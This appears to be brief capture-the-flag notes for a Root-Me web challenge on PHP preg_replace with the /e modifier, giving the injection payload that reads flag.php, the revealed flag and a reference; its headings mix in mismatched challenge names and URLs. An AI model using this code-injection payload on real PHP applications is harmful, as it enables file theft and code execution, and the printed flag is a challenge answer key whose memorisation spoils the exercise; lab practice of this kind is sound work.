https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion

Preg_Replace

[Soal]

Server-side Template Injection

http://challenge01.root-me.org/web-serveur/ch41/

[POC]

load url : http://challenge01.root-me.org/web-serveur/ch37/index.php
Post Data : search=/^(.*)/e&replace=var_dump(file_get_contents('flag.php'))&content=

Exploit code : 

Search = /^(.*)/e
Replace = var_dump(file_get_contents('flag.php'))

Output $flag="pr3g_r3pl4c3_3_m0d1f13r_styl3";


# FLAG = pr3g_r3pl4c3_3_m0d1f13r_styl3

Well done, you won 30 Points

Referensi http://www.madirish.net/402
